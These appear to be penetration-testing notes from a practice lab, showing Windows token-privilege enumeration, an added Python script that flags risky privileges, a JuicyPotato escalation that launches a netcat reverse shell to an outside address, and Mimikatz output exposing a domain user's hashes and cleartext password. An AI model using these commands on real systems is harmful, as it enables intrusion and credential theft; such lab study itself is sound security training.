3 privesc

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

OS Name: Microsoft Windows Server 2016 Standard
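
Audit-side check for the table above, added here as an example and not part of the original notes: it parses `whoami /priv` output and flags the token privileges a service account should not normally hold. The function names and the `SAMPLE` constant are assumptions made for illustration; the sample rows are copied from the output above.

```python
import re

# Privileges that allow a process to obtain and use another account's token.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample: the `whoami /priv` table shown in the notes above.
SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_whoami_priv(text):
    """Return {privilege name: state} from `whoami /priv` table output."""
    lines = text.splitlines()
    # The row of '=' runs marks where the data rows begin.
    ruler = next((i for i, l in enumerate(lines)
                  if re.fullmatch(r"=+( =+)+\s*", l)), None)
    if ruler is None:
        return {}
    privs = {}
    for line in lines[ruler + 1:]:
        parts = line.split()
        if not parts:
            break  # a blank line ends the table
        # The name is the first token and the state is the last token.
        privs[parts[0]] = parts[-1]
    return privs

def token_priv_findings(text):
    """List token privileges present in the token, sorted by name.

    Disabled entries are reported too: a privilege that is present but
    disabled can be enabled by the process that holds it.
    """
    privs = parse_whoami_priv(text)
    return sorted((p, s) for p, s in privs.items() if p in TOKEN_PRIVS)

if __name__ == "__main__":
    for name, state in token_priv_findings(SAMPLE):
        print(f"REVIEW: {name} ({state}) is held by this account")
```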

Using JuicyPotato

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
# SeImpersonatePrivilege; SeCreateGlobalPrivilege
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c PATH\nc.exe -e cmd.exe 10.2.74.151 9999" -t *

$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53225
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

whoami
whoami
nt authority\system

# loaded Mimikatz and extracted password for Sandra

Authentication Id : 0 ; 294058 (00000000:00047caa)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 4/24/2021 8:42:29 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
	msv :	
	 [00000003] Primary
	 * Username : sandra
	 * Domain   : MEGACORP
	 * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
	 * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
	 * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
	tspkg :	
	wdigest :	
	 * Username : sandra
	 * Domain   : MEGACORP
	 * Password : (null)
	kerberos :	
	 * Username : sandra
	 * Domain   : MEGACORP.LOCAL
	 * Password : Password1234!
